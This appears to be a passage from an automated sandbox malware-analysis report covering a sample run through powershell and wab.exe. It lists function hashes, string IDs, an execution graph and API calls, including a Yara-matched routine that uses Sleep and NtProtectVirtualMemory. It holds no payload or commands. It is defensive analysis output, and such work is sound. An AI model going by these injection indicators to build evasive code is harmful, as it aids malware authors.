                            • Opcode Fuzzy Hash: 2b86f0f1a58753641b5569f61383306045309f38b4bca3f1471529c2fa97f335
                            • Instruction Fuzzy Hash: BE514BF27043069FC7209B39D8217AABBA1BFC5311F14C46AED46CB391DA35D886D3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0765A058 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (f~l$(f~l$(f~l$(f~l
                            • API String ID: 0-538009330
                            • Opcode ID: 3baa4fb70ab4ed434cbf5926be8a4eee5e124ec8e7027a6b2f66ecf365b6994a
                            • Instruction ID: 59a5068ede2c577ebde2cfa4f0302867cbb7355e032cbcf23b01da0fd1f3bd1e
                            • Opcode Fuzzy Hash: 3baa4fb70ab4ed434cbf5926be8a4eee5e124ec8e7027a6b2f66ecf365b6994a
                            • Instruction Fuzzy Hash: 0D716EB0E00205DFDB14CFA8C941AAABFE2BF89314F14C269D906AB755CB32DD41DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 076557B0 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q$$^q
                            • API String ID: 0-2125118731
                            • Opcode ID: decbe2a7f43df34f1843a3b279c18346130250f47c4be646bd415e40c871d984
                            • Instruction ID: 1f8344abb067c9ffe0c761060d24f4c9084aedbbe5582d4e9274e82d2aeb8c68
                            • Opcode Fuzzy Hash: decbe2a7f43df34f1843a3b279c18346130250f47c4be646bd415e40c871d984
                            • Instruction Fuzzy Hash: ED3189B27003266BE734597A8C44B3A76975BC0B10F18882AED03CF396DD36DD45A3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 076563E0 Relevance: 5.1, Strings: 4, Instructions: 98COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 84|l$84|l$tP^q$tP^q
                            • API String ID: 0-1698968335
                            • Opcode ID: c45180d1902e82eade5eb3208ce0ef6a8c167045ffaad733be41221a967019cf
                            • Instruction ID: 7ccb83978251d646090312659ceb3dc8046e03ea13c1ef04318095497dc46214
                            • Opcode Fuzzy Hash: c45180d1902e82eade5eb3208ce0ef6a8c167045ffaad733be41221a967019cf
                            • Instruction Fuzzy Hash: EB3136B0F042556FC7259B78C814AAABFF1EB45B10F54C45AE8459F392C671DC49C3E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07650CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q$$^q
                            • API String ID: 0-2125118731
                            • Opcode ID: 921f8b19650924429228ec83b251a0a68dd7999574030f51a224389c22bc4fa2
                            • Instruction ID: 73285ba0bf2cb0da5b7be60f3278dd2f406954dc54298f62cd4104aacd1ea6de
                            • Opcode Fuzzy Hash: 921f8b19650924429228ec83b251a0a68dd7999574030f51a224389c22bc4fa2
                            • Instruction Fuzzy Hash: 3E217BB230030A5BD734197E9C00B2777DAABC1711F24852AEC0BCF385CD75D842A361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 076517A1 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2226926874.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7650000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q
                            • API String ID: 0-2049395529
                            • Opcode ID: e7a380bac7e7ab7ee3028518c3cc6d974747630f571b55ad678cd2634728d5df
                            • Instruction ID: b283fb3e514f671192d9be8b44b455f96add5c771c10f16facd88c148b905135
                            • Opcode Fuzzy Hash: e7a380bac7e7ab7ee3028518c3cc6d974747630f571b55ad678cd2634728d5df
                            • Instruction Fuzzy Hash: 96018F61A4A3C94FC32E073818206566FB25F83511B2A00DBC482DF35BC95A5D4A83A7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:0%
                            Dynamic/Decrypted Code Coverage:95.7%
                            Signature Coverage:26.1%
                            Total number of Nodes:115
                            Total number of Limit Nodes:1
                            execution_graph 64809 23b5f5b0 338 API calls 3 library calls 64812 23b385b8 552 API calls __startOneArgErrorHandling 64813 23b2c1a0 334 API calls 64667 23b33fa0 473 API calls 64668 23b633a0 331 API calls __startOneArgErrorHandling 64816 23b66da0 332 API calls 64670 23b2a790 412 API calls 64672 23be9793 10 API calls __startOneArgErrorHandling 64673 23b2bf80 350 API calls __except_handler4 64674 23b30780 350 API calls 64678 23b72380 645 API calls __except_handler4 64679 23b5c3f0 331 API calls 64681 23b5cbf0 GetPEB GetPEB GetPEB GetPEB 64830 23b281e6 9 API calls 64831 23bb19ee GetPEB GetPEB GetPEB 64833 23b659e0 330 API calls 64836 23b2c1d0 514 API calls 64838 23b5add0 335 API calls 64839 23b5cdd0 GetPEB GetPEB 64688 23b663d0 537 API calls 2 library calls 64689 23b697d0 332 API calls 64842 23bae1d0 197 API calls __except_handler4 64843 23bad5d0 328 API calls __vswprintf 64844 23b359c0 718 API calls __except_handler4 64845 23b565c0 418 API calls __vswprintf 64691 23bb07c3 348 API calls 2 library calls 64692 23bb63c0 336 API calls 64694 23b27330 325 API calls __vswprintf 64847 23bb4d39 331 API calls 2 library calls 64848 23b4c930 507 API calls 64852 23b2b120 412 API calls 64701 23b33720 339 API calls __startOneArgErrorHandling 64702 23b5eb20 350 API calls 64703 23b6f320 330 API calls 2 library calls 64709 23b67b13 646 API calls 64712 23bb5f10 548 API calls 64858 23b32102 204 API calls 64713 23b28300 327 API calls 64714 23b2bf00 336 API calls 64859 23b30100 331 API calls 2 library calls 64860 23b2e104 350 API calls 64719 23bd437c 329 API calls 64720 23b3c770 GetPEB __except_handler4 64864 23b6b970 369 API calls 64658 23b72b60 LdrInitializeThunk 64731 23bb2349 585 API calls 3 library calls 64875 23b278b0 194 API calls 64876 23b33cb0 16 API calls 64735 23b6c6a6 550 API calls 2 library calls 64736 23badaa9 343 API calls 2 library calls 64737 23b31ea0 18 API calls 64738 23b452a0 363 API calls 3 library calls 64879 23b6bca0 540 API calls 64880 23bacca0 330 API calls 64885 23b6909c 347 API calls 2 library calls 64744 23b27a80 346 API calls __except_handler4 64886 23b2b480 198 API calls 64888 23b64480 349 API calls 64747 23b63e8f 328 API calls 64748 23b86282 330 API calls 64749 23b2fef0 13 API calls 64890 23b2c0f0 345 API calls 64891 23b324f0 523 API calls 64892 23b398f0 576 API calls 64893 23b720f0 10 API calls 2 library calls 64896 23bb54f0 486 API calls __except_handler4 64752 23b2a2e0 536 API calls 2 library calls 64754 23b5d6e0 630 API calls 2 library calls 64903 23b320da LdrInitializeThunk __except_handler4 64758 23bb1acb 194 API calls __except_handler4 64760 23b2b2c0 345 API calls 64762 23b5eac0 342 API calls 64763 23b66ac0 201 API calls 64906 23bad0c0 326 API calls __except_handler4 64765 23b3ba30 542 API calls 64911 23bb5430 11 API calls __vswprintf 64912 23b6bc3b 329 API calls __except_handler4 64913 23b2a020 326 API calls 64914 23b2c020 12 API calls 64915 23b2e420 403 API calls __startOneArgErrorHandling 64916 23b2ec20 8 API calls 64767 23b4e627 557 API calls __except_handler4 64771 23b68e2f 353 API calls 64920 23bb6020 327 API calls 64921 23bb6420 333 API calls 2 library calls 64662 4fc8560 64663 4fc8599 64662->64663 64663->64662 64664 4fc7af4 64663->64664 64665 4fc85cd Sleep 64663->64665 64666 4fc8622 NtProtectVirtualMemory 64663->64666 64665->64662 64666->64663 64773 23b28210 193 API calls 64775 23bb321f 376 API calls 2 library calls 64777 23b6a210 9 API calls 64778 23bada1d 327 API calls __vswprintf 64923 23bb1810 551 API calls 64781 23bb0a0e 8 API calls 2 library calls 64783 23b68600 9 API calls 64925 23b6cc00 334 API calls 64787 23b69e0c 504 API calls __startOneArgErrorHandling 64788 23b2ea0c 515 API calls __except_handler4 64931 23baf87e 328 API calls 64933 23b69870 404 API calls 64934 23bad070 193 API calls 64792 23b29660 484 API calls 64794 23b69660 512 API calls __except_handler4 64796 23b2826b 351 API calls __startOneArgErrorHandling 64798 23bafa60 556 API calls 64942 23b32050 348 API calls 64943 23bd705e 335 API calls __except_handler4 64945 23b5b052 354 API calls 2 library calls 64946 23baf450 192 API calls 64947 23bb6050 325 API calls __vswprintf 64948 23b2645d 552 API calls __startOneArgErrorHandling 64949 23b27440 7 API calls 2 library calls 64804 23b67a40 329 API calls

                            Executed Functions

                            Function 04FC8560 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82sleepnativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • Sleep.KERNELBASE(00000005), ref: 04FC85D1
                            • NtProtectVirtualMemory.NTDLL(?,-0000101C,-00000018), ref: 04FC862A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2467703895.0000000004F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_4f10000_wab.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryProtectSleepVirtual
                            • String ID: y
                            • API String ID: 3235210055-1802128518
                            • Opcode ID: 847521f4400cfb1171425caa63b2e69594e4e218b41613d39b6e8241c3b965dd
                            • Instruction ID: 80291942d4b6a49834176d0824905d0da651e461eb2079fef259ab4d16980307
                            • Opcode Fuzzy Hash: 847521f4400cfb1171425caa63b2e69594e4e218b41613d39b6e8241c3b965dd
                            • Instruction Fuzzy Hash: 06219CB2A403038FE704AE34CD8D7E57BA6EF193F4F89854CE8444B166E77599858B42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 19 23b735c0-23b735cc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 26acff346886704fa27fc2ec39158ca307fa49b6a97a03e3c0cb22b79ae7d6fe
                            • Instruction ID: 01ebe9384a40d723acde79472aabe213b30cb20f6d1e533c8da9012d835c6e4e
                            • Opcode Fuzzy Hash: 26acff346886704fa27fc2ec39158ca307fa49b6a97a03e3c0cb22b79ae7d6fe
                            • Instruction Fuzzy Hash: 4890023160550803D500B5584594746100647D0301F65C461A442852DD87A58A5165A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 16 23b72b60-23b72b6c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: d8c6183422eefd0bbb1f0f57462187403436070222587546964b4109a700c068
                            • Instruction ID: d2c79839e4e0b4b03025d88b2b9c3514c85c194f4a180766227da62e17e7f224
                            • Opcode Fuzzy Hash: d8c6183422eefd0bbb1f0f57462187403436070222587546964b4109a700c068
                            • Instruction Fuzzy Hash: B3900471303404034505F55C44D4757400F47F0301F55C071F501C555DC535CDD17135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 18 23b72df0-23b72dfc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ce9528e53f507c49fdbc842238c17c2c8b86f05a3a0b09695e1f8ffc7c7ee326
                            • Instruction ID: 390817e229587701b6811e17a88a4079accba9b6856de13f45b9ed9cc2bb8b92
                            • Opcode Fuzzy Hash: ce9528e53f507c49fdbc842238c17c2c8b86f05a3a0b09695e1f8ffc7c7ee326
                            • Instruction Fuzzy Hash: C490023120140813D511B5584584747000A47D0341F95C462A442851DD96668A52A121
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 17 23b72c70-23b72c7c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 01bc96b6c050da9984e2b19ed840ba92e4b7dc2081dda459efed5fe51d6b5ae3
                            • Instruction ID: 43c3e637700de919fd07e63ca63ad0e37c6c75ce9400dadb8dcdead617545410
                            • Opcode Fuzzy Hash: 01bc96b6c050da9984e2b19ed840ba92e4b7dc2081dda459efed5fe51d6b5ae3
                            • Instruction Fuzzy Hash: F190023120148C03D510B558848478A000647D0301F59C461A842861DD86A589917121
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 23BB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2160512332
                            • Opcode ID: f313158d56792107320141887009b84cadbd6413e421f3d989dd8595ad4c2d6f
                            • Instruction ID: c5192f2ee2199e1e82b25b79fe1acec6424a11d660938030380e823a14c8d292
                            • Opcode Fuzzy Hash: f313158d56792107320141887009b84cadbd6413e421f3d989dd8595ad4c2d6f
                            • Instruction Fuzzy Hash: BA925C71A14741AFD720DF24C880B6AB7FAEB88750F0449BDFA98DB261DB70D844CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 641 23b68620-23b68681 642 23b68687-23b68698 641->642 643 23ba5297-23ba529d 641->643 643->642 644 23ba52a3-23ba52b0 GetPEB 643->644 644->642 645 23ba52b6-23ba52b9 644->645 646 23ba52bb-23ba52c5 645->646 647 23ba52d6-23ba52fc call 23b72ce0 645->647 646->642 648 23ba52cb-23ba52d4 646->648 647->642 652 23ba5302-23ba5306 647->652 650 23ba532d-23ba5341 call 23b354a0 648->650 656 23ba5347-23ba5353 650->656 652->642 654 23ba530c-23ba5321 call 23b72ce0 652->654 654->642 664 23ba5327 654->664 658 23ba5359-23ba536d 656->658 659 23ba555c-23ba5568 call 23ba556d 656->659 662 23ba538b-23ba5401 658->662 663 23ba536f 658->663 659->642 669 23ba543a-23ba543d 662->669 670 23ba5403-23ba5435 call 23b2fd50 662->670 666 23ba5371-23ba5378 663->666 664->650 666->662 668 23ba537a-23ba537c 666->668 671 23ba537e-23ba5381 668->671 672 23ba5383-23ba5385 668->672 674 23ba5443-23ba5494 669->674 675 23ba5514-23ba5517 669->675 681 23ba554d-23ba5552 call 23bba4b0 670->681 671->666 672->662 676 23ba5555-23ba5557 672->676 682 23ba54ce-23ba5512 call 23b2fd50 * 2 674->682 683 23ba5496-23ba54cc call 23b2fd50 674->683 675->676 677 23ba5519-23ba5548 call 23b2fd50 675->677 676->656 677->681 681->676 682->681 683->681
                            Strings
                            • double initialized or corrupted critical section, xrefs: 23BA5508
                            • Critical section address, xrefs: 23BA5425, 23BA54BC, 23BA5534
                            • Invalid debug info address of this critical section, xrefs: 23BA54B6
                            • Thread is in a state in which it cannot own a critical section, xrefs: 23BA5543
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 23BA54E2
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 23BA54CE
                            • undeleted critical section in freed memory, xrefs: 23BA542B
                            • Address of the debug info found in the active list., xrefs: 23BA54AE, 23BA54FA
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 23BA540A, 23BA5496, 23BA5519
                            • Critical section address., xrefs: 23BA5502
                            • Thread identifier, xrefs: 23BA553A
                            • Critical section debug info address, xrefs: 23BA541F, 23BA552E
                            • corrupted critical section, xrefs: 23BA54C2
                            • 8, xrefs: 23BA52E3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            • API String ID: 0-2368682639
                            • Opcode ID: 58a4b6088956a90a909a8287f6c4e2320fefc168f9d4e77f333c71de4f1323f5
                            • Instruction ID: dd5daf49632bd58f5135232a728036f8cc492381c7d8ff1ca99db234cc3272d9
                            • Opcode Fuzzy Hash: 58a4b6088956a90a909a8287f6c4e2320fefc168f9d4e77f333c71de4f1323f5
                            • Instruction Fuzzy Hash: 05818AB1900748AFDF10CF98C884B9EBBB9FB48700F2441AAF558F7241D775AA40CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                            • API String ID: 0-3591852110
                            • Opcode ID: 28c7502829ea96384cbb20fcf573632ffd0c689ea48f5a5222c163381e5a9354
                            • Instruction ID: 5fe279f7379cb0bf71d63eaa72b2de3f04c4c4cba64d3d0b7417df940fe71d04
                            • Opcode Fuzzy Hash: 28c7502829ea96384cbb20fcf573632ffd0c689ea48f5a5222c163381e5a9354
                            • Instruction Fuzzy Hash: 3712D370604641DFD729DF28C480BA6BBF5FF09704FA885E9E49D8B652D734E982CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                            • API String ID: 0-3532704233
                            • Opcode ID: 1ee2eacf9ab9f4e7c93322f8d93eb3a66ccf43f76ba6c35ee0e39e73fc5ae75a
                            • Instruction ID: 9681b6db4cad319c4e94e50ecb7c3ee4d325c07eb4a84534a3f3c9e7b0949e51
                            • Opcode Fuzzy Hash: 1ee2eacf9ab9f4e7c93322f8d93eb3a66ccf43f76ba6c35ee0e39e73fc5ae75a
                            • Instruction Fuzzy Hash: 52B199729087419FC711DF24C480A5BBBE8EB88744F054ABFF9A8D7250D770DA48CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                            • API String ID: 0-3063724069
                            • Opcode ID: 3c91a3569589290ea8eeded49e24008c501f39c713da782abc0bfbcc74fa81a8
                            • Instruction ID: 34c0c79174be2a75aaf02fe5687f690b0a9e85d00cead8c57ac538af5abc7f58
                            • Opcode Fuzzy Hash: 3c91a3569589290ea8eeded49e24008c501f39c713da782abc0bfbcc74fa81a8
                            • Instruction Fuzzy Hash: 1DD1CEB2809395AFE731DE608840BABB7F8EB9C714F044DB9FA9497250D770C904C796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23BE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                            • API String ID: 0-1700792311
                            • Opcode ID: 70bde8bbf68f9e5ce863e2106966b0551fbc5f08cee240deb738b4361d7c3f4d
                            • Instruction ID: efe4f594e5f677881a36ce24f15ed132990db137c22e6a3857c87b3fb081e56d
                            • Opcode Fuzzy Hash: 70bde8bbf68f9e5ce863e2106966b0551fbc5f08cee240deb738b4361d7c3f4d
                            • Instruction Fuzzy Hash: FBD1E171500B85DFCB11EFAAC440AADBBF1FF69700F8881A9E8599B662C738D941DB14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                            Download Yara Rule
                            Strings
                            • @, xrefs: 23B2D313
                            • @, xrefs: 23B2D0FD
                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 23B2D0CF
                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 23B2D196
                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 23B2D262
                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 23B2D146
                            • @, xrefs: 23B2D2AF
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 23B2D2C3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
